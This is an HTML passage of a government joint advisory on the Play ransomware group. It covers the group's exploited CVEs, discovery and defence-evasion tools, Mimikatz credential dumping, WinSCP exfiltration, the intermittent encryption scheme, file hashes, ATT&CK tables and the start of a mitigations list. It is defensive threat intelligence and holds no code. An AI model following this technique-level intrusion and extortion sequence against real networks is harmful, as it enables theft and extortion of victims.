5627. <p>For a downloadable copy of IOCs, see:</p>
5628.  
5629.  
5630.  
5631.  
5632.  
5633. <div class="c-file">
5634.    <div class="c-file__download">
5635.    <a href="https://www.cisa.gov/sites/default/files/2023-12/AA23-352A.stix_.xml" class="c-file__link" target="_blank">AA23-352A STIX XML</a>
5636.    <span class="c-file__size">(XML,       34.87 KB
5637.  )</span>
5638.  </div>
5639. </div>
5640.  
5641.  
5642.  
5643.  
5644.  
5645. <div class="c-file">
5646.    <div class="c-file__download">
5647.    <a href="https://www.cisa.gov/sites/default/files/2023-12/AA23-352A-StopRansomware-Play-Ransomware.stix_.json" class="c-file__link" target="_blank">AA23-352A STIX JSON</a>
5648.    <span class="c-file__size">(JSON,       30.22 KB
5649.  )</span>
5650.  </div>
5651. </div>
5652. <h3><strong>TECHNICAL DETAILS</strong></h3>
5653. <p><strong>Note: </strong>This advisory uses the <a href="https://attack.mitre.org/versions/v14/matrices/enterprise/">MITRE ATT&CK<sup>®</sup> for Enterprise</a> framework, version 14. See the MITRE ATT&CK for Enterprise section for all referenced tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&CK Mapping">Best Practices for MITRE ATT&CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="cisagov / decider">Decider Tool</a>.</p>
5654. <h4><strong>Initial Access</strong></h4>
5655. <p>The Play ransomware group gains initial access to victim networks through the abuse of valid accounts [<a href="https://attack.mitre.org/versions/v14/techniques/T1078/" title="Valid Accounts">T1078</a>] and exploitation of public-facing applications [<a href="https://attack.mitre.org/versions/v14/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a>], specifically through known FortiOS (<a href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379" title="CVE-2018-13379">CVE-2018-13379</a> and <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-12812" title="CVE-2020-12812">CVE-2020-12812</a>) and Microsoft Exchange (ProxyNotShell [<a href="https://nvd.nist.gov/vuln/detail/CVE-2022-41040" title="CVE-2022-41040">CVE-2022-41040</a> and <a href="https://nvd.nist.gov/vuln/detail/CVE-2022-41082" title="CVE-2022-41082">CVE-2022-41082</a>]) vulnerabilities. Play ransomware actors have been observed to use external-facing services [<a href="https://attack.mitre.org/versions/v14/techniques/T1133/" title="External Remote Services">T1133</a>] such as Remote Desktop Protocol (RDP) and Virtual Private Networks (VPN) for initial access.</p>
5656. <h4><strong>Discovery and Defense Evasion</strong></h4>
5657. <p>Play ransomware actors use tools like <a href="https://attack.mitre.org/versions/v14/software/S0552/" title="AdFind">AdFind</a> to run Active Directory queries [<a href="https://attack.mitre.org/tactics/TA0007/" title="Discovery">TA0007</a>] and Grixba [<a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy" title="Play Ransomware Group Using New Custom Data-Gathering Tools">1</a>], an information-stealer, to enumerate network information [<a href="https://attack.mitre.org/versions/v14/techniques/T1016/" title="System Network Configuration Discovery">T1016</a>] and scan for anti-virus software [<a href="https://attack.mitre.org/versions/v14/techniques/T1518/001/" title="Software Discovery: Security Software Discovery">T1518.001</a>]. Actors also use tools like GMER, IOBit, and PowerTool to disable anti-virus software [<a href="https://attack.mitre.org/versions/v14/techniques/T1562/001/" title="Impair Defenses: Disable or Modify Tools">T1562.001</a>] and remove log files [<a href="https://attack.mitre.org/versions/v14/techniques/T1070/001/" title="Indicator Removal: Clear Windows Event Logs">T1070.001</a>]. In some instances, cybersecurity researchers have observed Play ransomware actors using <a href="https://attack.mitre.org/versions/v14/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">PowerShell</a> scripts to target Microsoft Defender.[<a href="https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play" title="Ransomware Spotlight | Play">2</a>]</p>
5658. <h4><strong>Lateral Movement and Execution</strong></h4>
5659. <p>Play ransomware actors use command and control (C2) applications, including <a href="https://attack.mitre.org/versions/v14/software/S0154/" title="Cobalt Strike">Cobalt Strike</a> and SystemBC, and tools like <a href="https://attack.mitre.org/versions/v14/software/S0029/" title="PsExec">PsExec</a>, to assist with lateral movement and file execution. Once established on a network, the ransomware actors search for unsecured credentials [<a href="https://attack.mitre.org/versions/v14/techniques/T1552/" title="Unsecured Credentials">T1552</a>] and use the <a href="https://attack.mitre.org/versions/v14/software/S0002/" title="Mimikatz">Mimikatz</a> credential dumper to gain domain administrator access [<a href="https://attack.mitre.org/versions/v14/techniques/T1003/" title="OS Credential Dumping">T1003</a>]. According to open source reporting [<a href="https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play" title="Ransomware Spotlight | Play">2</a>], to further enumerate vulnerabilities, Play ransomware actors use Windows Privilege Escalation Awesome Scripts (WinPEAS) [<a href="https://attack.mitre.org/versions/v14/techniques/T1059/" title="Command and Scripting Interpreter">T1059</a>] to search for additional <a href="https://attack.mitre.org/versions/v14/tactics/TA0004/" title="Privilege Escalation">privilege escalation</a> paths. Actors then distribute executables [<a href="https://attack.mitre.org/versions/v14/techniques/T1570/" title="Lateral Tool Transfer">T1570</a>] via Group Policy Objects [<a href="https://attack.mitre.org/versions/v14/techniques/T1484/001/" title="Domain Policy Modification: Group Policy Modification">T1484.001</a>].</p>
5660. <h4><strong>Exfiltration and Encryption</strong></h4>
5661. <p>Play ransomware actors often split compromised data into segments and use tools like WinRAR to compress files [<a href="https://attack.mitre.org/versions/v14/techniques/T1560/001/" title="Archive Collected Data: Archive via Utility">T1560.001</a>] into <code>.RAR</code> format for exfiltration. The actors then use WinSCP to transfer data [<a href="https://attack.mitre.org/versions/v14/techniques/T1048/" title="Exfiltration Over Alternative Protocol">T1048</a>] from a compromised network to actor-controlled accounts. Following exfiltration, files are encrypted [<a href="https://attack.mitre.org/versions/v14/techniques/T1486/" title="Data Encrypted for Impact">T1486</a>] with AES-RSA hybrid encryption using intermittent encryption, encrypting every other file portion of 0x100000 bytes. [<a href="https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/" title="Crimeware Trends | Ransomware Developers Turn to Intermittent Encryption to Evade Detection">3</a>] (<strong>Note: </strong>System files are skipped during the encryption process.) A <code>.play</code> extension is added to file names and a ransom note titled <code>ReadMe[.]txt</code> is placed in file directory <code>C:</code>.</p>
5662. <h4><strong>Impact</strong></h4>
5663. <p>The Play ransomware group uses a double-extortion model [<a href="https://attack.mitre.org/versions/v14/techniques/T1657/" title="Financial Theft">T1657</a>], encrypting systems after exfiltrating data. The ransom note directs victims to contact the Play ransomware group at an email address ending in <code>@gmx[.]de</code>. Ransom payments are paid in cryptocurrency to wallet addresses provided by Play actors. If a victim refuses to pay the ransom demand, the ransomware actors threaten to publish exfiltrated data to their leak site on the Tor network (<code>[.]onion</code> URL).</p>
5664. <h4><strong>Leveraged Tools</strong></h4>
5665. <p>Table 1 lists legitimate tools Play ransomware actors have repurposed for their operations. The legitimate tools listed in this product are all publicly available. Use of these tools and applications should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.</p>
5666. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
5667. <caption><em>Table 1: Tools Leveraged by Play Ransomware Actors</em></caption>
5668. <thead>
5669. <tr>
5670. <td><strong>Name</strong></td>
5671. <td><strong>Description</strong></td>
5672. </tr>
5673. </thead>
5674. <tbody>
5675. <tr>
5676. <td>
5677. <p>AdFind</p>
5678. </td>
5679. <td>
5680. <p>Used to query and retrieve information from Active Directory.</p>
5681. </td>
5682. </tr>
5683. <tr>
5684. <td>
5685. <p>Bloodhound</p>
5686. </td>
5687. <td>
5688. <p>Used to query and retrieve information from Active Directory.</p>
5689. </td>
5690. </tr>
5691. <tr>
5692. <td>
5693. <p>GMER</p>
5694. </td>
5695. <td>
5696. <p>A software tool intended to be used for detecting and removing rootkits.</p>
5697. </td>
5698. </tr>
5699. <tr>
5700. <td>
5701. <p>IOBit</p>
5702. </td>
5703. <td>
5704. <p>An anti-malware and anti-virus program for the Microsoft Windows operating system. Play actors have accessed IOBit to disable anti-virus software.</p>
5705. </td>
5706. </tr>
5707. <tr>
5708. <td>
5709. <p>PsExec</p>
5710. </td>
5711. <td>
5712. <p>A tool designed to run programs and execute commands on remote systems.</p>
5713. </td>
5714. </tr>
5715. <tr>
5716. <td>
5717. <p>PowerTool</p>
5718. </td>
5719. <td>
5720. <p>A Windows utility designed to improve speed, remove bloatware, protect privacy, and eliminate data collection, among other things.</p>
5721. </td>
5722. </tr>
5723. <tr>
5724. <td>
5725. <p>PowerShell</p>
5726. </td>
5727. <td>
5728. <p>A cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.</p>
5729. </td>
5730. </tr>
5731. <tr>
5732. <td>
5733. <p>Cobalt Strike</p>
5734. </td>
5735. <td>
5736. <p>A penetration testing tool used by security professionals to test the security of networks and systems. Play ransomware actors have used it to assist with lateral movement and file execution.</p>
5737. </td>
5738. </tr>
5739. <tr>
5740. <td>
5741. <p>Mimikatz</p>
5742. </td>
5743. <td>
5744. <p>Allows users to view and save authentication credentials such as Kerberos tickets. Play ransomware actors have used it to add accounts to domain controllers.</p>
5745. </td>
5746. </tr>
5747. <tr>
5748. <td>
5749. <p>WinPEAS</p>
5750. </td>
5751. <td>
5752. <p>Used to search for additional privilege escalation paths.</p>
5753. </td>
5754. </tr>
5755. <tr>
5756. <td>
5757. <p>WinRAR</p>
5758. </td>
5759. <td>
5760. <p>Used to split compromised data into segments and to compress files into <code>.RAR</code> format for exfiltration.</p>
5761. </td>
5762. </tr>
5763. <tr>
5764. <td>
5765. <p>WinSCP</p>
5766. </td>
5767. <td>
5768. <p>Windows Secure Copy is a free and open-source Secure Shell (SSH) File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Play ransomware actors have used it to transfer data [<a href="https://attack.mitre.org/versions/v14/techniques/T1048/" title="Exfiltration Over Alternative Protocol">T1048</a>] from a compromised network to actor-controlled accounts.</p>
5769. </td>
5770. </tr>
5771. <tr>
5772. <td>
5773. <p>Microsoft Nltest</p>
5774. </td>
5775. <td>
5776. <p>Used by Play ransomware actors for network discovery.</p>
5777. </td>
5778. </tr>
5779. <tr>
5780. <td>
5781. <p>Nekto / PriviCMD</p>
5782. </td>
5783. <td>
5784. <p>Used by Play ransomware actors for privilege escalation.</p>
5785. </td>
5786. </tr>
5787. <tr>
5788. <td>
5789. <p>Process Hacker</p>
5790. </td>
5791. <td>
5792. <p>Used to enumerate running processes on a system.</p>
5793. </td>
5794. </tr>
5795. <tr>
5796. <td>
5797. <p>Plink</p>
5798. </td>
5799. <td>
5800. <p>Used to establish persistent SSH tunnels.</p>
5801. </td>
5802. </tr>
5803. </tbody>
5804. </table>
5805. <h4><strong>Indicators of Compromise</strong></h4>
5806. <p>See Table 2 for Play ransomware IOCs obtained from FBI investigations as of October 2023.</p>
5807. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
5808. <caption><em>Table 2: Hashes Associated with Play Ransomware Actors</em></caption>
5809. <thead>
5810. <tr>
5811. <td><strong>Hashes (SHA256)</strong></td>
5812. <td><strong>Description</strong></td>
5813. </tr>
5814. </thead>
5815. <tbody>
5816. <tr>
5817. <td>
5818. <p>453257c3494addafb39cb6815862403e827947a1e7737eb8168cd10522465deb</p>
5819. </td>
5820. <td>
5821. <p>Play ransomware custom data gathering tool</p>
5822. </td>
5823. </tr>
5824. <tr>
5825. <td>
5826. <p>47c7cee3d76106279c4c28ad1de3c833c1ba0a2ec56b0150586c7e8480ccae57</p>
5827. </td>
5828. <td>
5829. <p>Play ransomware encryptor</p>
5830. </td>
5831. </tr>
5832. <tr>
5833. <td>
5834. <p>75404543de25513b376f097ceb383e8efb9c9b95da8945fd4aa37c7b2f226212</p>
5835. </td>
5836. <td>
5837. <p>SystemBC malware EXE</p>
5838. </td>
5839. </tr>
5840. <tr>
5841. <td>
5842. <p>7a42f96599df8090cf89d6e3ce4316d24c6c00e499c8557a2e09d61c00c11986</p>
5843. </td>
5844. <td>
5845. <p>SystemBC malware DLL</p>
5846. </td>
5847. </tr>
5848. <tr>
5849. <td>
5850. <p>7a6df63d883bbccb315986c2cfb76570335abf84fafbefce047d126b32234af8</p>
5851. </td>
5852. <td>
5853. <p>Play ransomware binary</p>
5854. </td>
5855. </tr>
5856. <tr>
5857. <td>
5858. <p>7dea671be77a2ca5772b86cf8831b02bff0567bce6a3ae023825aa40354f8aca</p>
5859. </td>
5860. <td>
5861. <p>SystemBC malware DLL</p>
5862. </td>
5863. </tr>
5864. <tr>
5865. <td>
5866. <p>c59f3c8d61d940b56436c14bc148c1fe98862921b8f7bad97fbc96b31d71193c</p>
5867. </td>
5868. <td>
5869. <p>Play network scanner</p>
5870. </td>
5871. </tr>
5872. <tr>
5873. <td>
5874. <p>e652051fe47d784f6f85dc00adca1c15a8c7a40f1e5772e6a95281d8bf3d5c74</p>
5875. </td>
5876. <td>
5877. <p>Play ransomware binary</p>
5878. </td>
5879. </tr>
5880. <tr>
5881. <td>
5882. <p>e8d5ad0bf292c42a9185bb1251c7e763d16614c180071b01da742972999b95da</p>
5883. </td>
5884. <td>
5885. <p>Play ransomware binary</p>
5886. </td>
5887. </tr>
5888. </tbody>
5889. </table>
5890. <h3><strong>MITRE ATT&CK TACTICS AND TECHNIQUES</strong></h3>
5891. <p>See Table 3–Table 11 for all referenced threat actor tactics and techniques in this advisory.</p>
5892. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
5893. <caption><em>Table 3: Play ATT&CK Techniques for Enterprise for Initial Access</em></caption>
5894. <thead>
5895. <tr>
5896. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
5897. <th scope="col" role="columnheader"><strong>ID</strong></th>
5898. <th scope="col" role="columnheader"><strong>Use</strong></th>
5899. </tr>
5900. </thead>
5901. <tbody>
5902. <tr>
5903. <td>
5904. <p>Valid Accounts</p>
5905. </td>
5906. <td>
5907. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1078/" title="Valid Accounts">T1078</a></p>
5908. </td>
5909. <td>
5910. <p>Play ransomware actors obtain and abuse existing account credentials to gain initial access.</p>
5911. </td>
5912. </tr>
5913. <tr>
5914. <td>
5915. <p>Exploit Public Facing Application</p>
5916. </td>
5917. <td>
5918. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1190/" title="Exploit Public Facing Application">T1190</a></p>
5919. </td>
5920. <td>
5921. <p>Play ransomware actors exploit vulnerabilities in internet-facing systems to gain access to networks.</p>
5922. </td>
5923. </tr>
5924. <tr>
5925. <td>
5926. <p>External Remote Services</p>
5927. </td>
5928. <td>
5929. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1133/" title="External Remote Services">T1133</a></p>
5930. </td>
5931. <td>
5932. <p>Play ransomware actors have used remote access services, such as RDP/VPN connection to gain initial access.</p>
5933. </td>
5934. </tr>
5935. </tbody>
5936. </table>
5937. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
5938. <caption><em>Table 4: Play ATT&CK Techniques for Enterprise for Discovery</em></caption>
5939. <thead>
5940. <tr>
5941. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
5942. <th scope="col" role="columnheader"><strong>ID</strong></th>
5943. <th scope="col" role="columnheader"><strong>Use</strong></th>
5944. </tr>
5945. </thead>
5946. <tbody>
5947. <tr>
5948. <td>
5949. <p>System Network Configuration Discovery</p>
5950. </td>
5951. <td>
5952. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1016/" title="System Network Configuration Discovery">T1016</a></p>
5953. </td>
5954. <td>
5955. <p>Play ransomware actors use tools like Grixba to identify network configurations and settings.</p>
5956. </td>
5957. </tr>
5958. <tr>
5959. <td>
5960. <p>Software Discovery: Security Software Discovery</p>
5961. </td>
5962. <td>
5963. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1518/001/" title="Software Discovery: Security Software Discovery">T1518.001</a></p>
5964. </td>
5965. <td>
5966. <p>Play ransomware actors scan for anti-virus software.</p>
5967. </td>
5968. </tr>
5969. </tbody>
5970. </table>
5971. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
5972. <caption><em>Table 5: Play ATT&CK Techniques for Enterprise for Defense Evasion</em></caption>
5973. <thead>
5974. <tr>
5975. <th scope="col" role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
5976. <th scope="col" role="columnheader">ID</th>
5977. <th scope="col" role="columnheader">Use</th>
5978. </tr>
5979. </thead>
5980. <tbody>
5981. <tr>
5982. <td>
5983. <p>Impair Defenses: Disable or Modify Tools</p>
5984. </td>
5985. <td>
5986. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1562/001/" title="Impair Defenses: Disable or Modify Tools">T1562.001</a></p>
5987. </td>
5988. <td>
5989. <p>Play ransomware actors use tools like GMER, IOBit, and PowerTool to disable anti-virus software.</p>
5990. </td>
5991. </tr>
5992. <tr>
5993. <td>
5994. <p>Indicator Removal: Clear Windows Event Logs</p>
5995. </td>
5996. <td>
5997. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1070/001/" title="Indicator Removal: Clear Windows Event Logs">T1070.001</a></p>
5998. </td>
5999. <td>
6000. <p>Play ransomware actors delete logs or other indicators of compromise to hide intrusion activity.</p>
6001. </td>
6002. </tr>
6003. </tbody>
6004. </table>
6005. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
6006. <caption><em>Table 6: Play ATT&CK Techniques for Enterprise for Credential Access</em></caption>
6007. <thead>
6008. <tr>
6009. <td><strong>Technique Title</strong></td>
6010. <td><strong>ID</strong></td>
6011. <td><strong>Use</strong></td>
6012. </tr>
6013. </thead>
6014. <tbody>
6015. <tr>
6016. <td>
6017. <p>Unsecured Credentials</p>
6018. </td>
6019. <td>
6020. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1552/" title="Unsecured Credentials">T1552</a></p>
6021. </td>
6022. <td>
6023. <p>Play ransomware actors attempt to identify and exploit credentials stored unsecurely on a compromised network.</p>
6024. </td>
6025. </tr>
6026. <tr>
6027. <td>
6028. <p>OS Credential Dumping</p>
6029. </td>
6030. <td>
6031. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1003/" title="OS Credential Dumping">T1003</a></p>
6032. </td>
6033. <td>
6034. <p>Play ransomware actors use tools like Mimikatz to dump credentials.</p>
6035. </td>
6036. </tr>
6037. </tbody>
6038. </table>
6039. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
6040. <caption><em>Table 7: Play ATT&CK Techniques for Enterprise for Lateral Movement</em></caption>
6041. <thead>
6042. <tr>
6043. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
6044. <th scope="col" role="columnheader"><strong>ID</strong></th>
6045. <th scope="col" role="columnheader"><strong>Use</strong></th>
6046. </tr>
6047. </thead>
6048. <tbody>
6049. <tr>
6050. <td>
6051. <p>Lateral Tool Transfer</p>
6052. </td>
6053. <td>
6054. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1570/" title="Lateral Tool Transfer">T1570</a></p>
6055. </td>
6056. <td>
6057. <p>Play ransomware actors distribute executables within the compromised environment.</p>
6058. </td>
6059. </tr>
6060. </tbody>
6061. </table>
6062. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
6063. <caption><em>Table 8: Play ATT&CK Techniques for Enterprise for Command and Control</em></caption>
6064. <thead>
6065. <tr>
6066. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
6067. <th scope="col" role="columnheader"><strong>ID</strong></th>
6068. <th scope="col" role="columnheader"><strong>Use</strong></th>
6069. </tr>
6070. </thead>
6071. <tbody>
6072. <tr>
6073. <td>
6074. <p>Domain Policy Modification: Group Policy Modification</p>
6075. </td>
6076. <td>
6077. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1484/001/" title="Domain Policy Modification: Group Policy Modification">T1484.001</a></p>
6078. </td>
6079. <td>
6080. <p>Play ransomware actors distribute executables via Group Policy Objects.</p>
6081. </td>
6082. </tr>
6083. </tbody>
6084. </table>
6085. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
6086. <caption><em>Table 9: Play ATT&CK Techniques for Enterprise for Collection</em></caption>
6087. <thead>
6088. <tr>
6089. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
6090. <th scope="col" role="columnheader"><strong>ID</strong></th>
6091. <th scope="col" role="columnheader"><strong>Use</strong></th>
6092. </tr>
6093. </thead>
6094. <tbody>
6095. <tr>
6096. <td>
6097. <p>Archive Collected Data: Archive via Utility</p>
6098. </td>
6099. <td>
6100. <p><u><a href="https://attack.mitre.org/versions/v14/techniques/T1560/001/" title="Archive Collected Data: Archive via Utility">T1560.001</a></u></p>
6101. </td>
6102. <td>
6103. <p>Play ransomware actors use tools like WinRAR to compress files.</p>
6104. </td>
6105. </tr>
6106. </tbody>
6107. </table>
6108. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
6109. <caption><em>Table 10: Play ATT&CK Techniques for Enterprise for Exfiltration</em></caption>
6110. <thead>
6111. <tr>
6112. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
6113. <th scope="col" role="columnheader"><strong>ID</strong></th>
6114. <th scope="col" role="columnheader"><strong>Use</strong></th>
6115. </tr>
6116. </thead>
6117. <tbody>
6118. <tr>
6119. <td>
6120. <p>Exfiltration Over Alternative Protocol</p>
6121. </td>
6122. <td>
6123. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1048/" title="Exfiltration Over Alternative Protocol">T1048</a></p>
6124. </td>
6125. <td>
6126. <p>Play ransomware actors use file transfer tools like WinSCP to transfer data.</p>
6127. </td>
6128. </tr>
6129. </tbody>
6130. </table>
6131. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
6132. <caption><em>Table 11: Play ATT&CK Techniques for Enterprise for Impact</em></caption>
6133. <thead>
6134. <tr>
6135. <th scope="col" role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
6136. <th scope="col" role="columnheader"><strong>ID</strong></th>
6137. <th scope="col" role="columnheader"><strong>Use</strong></th>
6138. </tr>
6139. </thead>
6140. <tbody>
6141. <tr>
6142. <td>
6143. <p>Data Encrypted for Impact</p>
6144. </td>
6145. <td>
6146. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1486/" title="Data Encrypted for Impact">T1486</a></p>
6147. </td>
6148. <td>
6149. <p>Play ransomware actors encrypt data on target systems to interrupt availability to system and network resources.</p>
6150. </td>
6151. </tr>
6152. <tr>
6153. <td>
6154. <p>Financial Theft</p>
6155. </td>
6156. <td>
6157. <p><a href="https://attack.mitre.org/versions/v14/techniques/T1657/" title="Financial Theft">T1657</a></p>
6158. </td>
6159. <td>
6160. <p>Play ransomware actors use a double-extortion model for financial gain.</p>
6161. </td>
6162. </tr>
6163. </tbody>
6164. </table>
6165. <h3><strong>MITIGATIONS</strong></h3>
6166. <p>These mitigations apply to all critical infrastructure organizations and network defenders. The FBI, CISA, and ASD’s ACSC recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems), thus, strengthening the security posture for their customers.<br><br>
6167. For more information on secure by design, see CISA’s <a href="https://www.cisa.gov/securebydesign" title="Secure by Design">Secure by Design and Default</a> webpage and <a href="https://www.cisa.gov/resources-tools/resources/secure-by-design" title="Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software">joint guide</a>.</p>
6168. <p>The FBI, CISA, and ASD’s ACSC recommend organizations apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Play ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
6169. <ul>
6170. <li><strong>Implement a recovery plan</strong> to maintain and retain multiple copies of sensitive or proprietary data and servers [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.F, 2.R, 2.S</a>] in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).</li>
6171. <li><strong>Require all accounts</strong> with password logins (e.g., service account, admin accounts, and domain admin accounts) <strong>to comply</strong> with NIST’s <a href="https://pages.nist.gov/800-63-3/" title="Digital Identity Guidelines">standards</a> for developing and managing password policies [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.C</a>].
6172. <ul>
6173. <li>Use longer passwords consisting of at least 8 characters and no more than 64 characters in length [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.B</a>];</li>
6174. <li>Store passwords in hashed format using industry-recognized password managers;</li>
6175. <li>Add password user “salts” to shared login credentials;</li>
6176. <li>Avoid reusing passwords;</li>
6177. <li>Implement multiple failed login attempt account lockouts [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.G</a>];</li>
6178. <li>Disable password “hints”;</li>
6179. <li>Refrain from requiring password changes more frequently than once per year.<br><br>
6180. <strong>Note:</strong> NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.</li>
6181. <li>Require administrator credentials to install software.</li>
6182. </ul>
6183. </li>
6184. <li><strong>Require multifactor authentication</strong> [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.H</a>] for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems. Also see <a href="https://www.cyber.gov.au/protect-yourself/resources-protect-yourself/personal-security-guides/protect-yourself-multi-factor-authentication" title="Protect Yourself: Multi-Factor Authentication">Protect Yourself: Multi-Factor Authentication | Cyber.gov.au</a>.</li>
6185. <li><strong>Keep all operating systems, software, and firmware up to date.</strong> Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">known exploited vulnerabilities</a> in internet-facing systems [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 1.E</a>]. Organizations are advised to deploy the latest Microsoft Exchange security updates. If unable to patch, then disable Outlook Web Access (OWA) until updates are able to be undertaken. Also see <a href="https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-administration/patching-applications-and-operating-systems" title="Patching Applications and Operating Systems">Patching Applications and Operating Systems | Cyber.gov.au</a>.</li>
6186. <li><strong>Segment networks</strong> [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.F</a>] to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement. Also see <a href="https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/network-hardening/implementing-network-segmentation-and-segregation" title="Implementing Network Segmentation and Segregation">Implementing Network Segmentation and Segregation</a>.</li>
6187. <li><strong>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware</strong> with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 1.E</a>]. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.</li>
6188. <li><strong>Filter network traffic </strong>by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents actors from directly connecting to remote access services they have established for persistence. Also see <a href="https://d3fend.mitre.org/technique/d3f:NetworkTrafficFiltering/" title="Network Traffic Filtering">Inbound Traffic Filtering – Technique D3-ITF</a>.</li>
6189. <li><strong>Install, regularly update, and enable real time detection for antivirus software</strong> on all hosts.</li>
6190. <li><strong>Review domain controllers, servers, workstations, and active directories</strong> for new and/or unrecognized accounts [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 1.A, 2.O</a>].</li>
6191. <li><strong>Audit user accounts</strong> with administrative privileges and configure access controls according to the principle of least privilege [<a href="https://www.cisa.gov/resources-tools/resources/cpg-report" title="Cross-Sector Cybersecurity Performance Goals March 2023 Update">CPG 2.E</a>].</li>
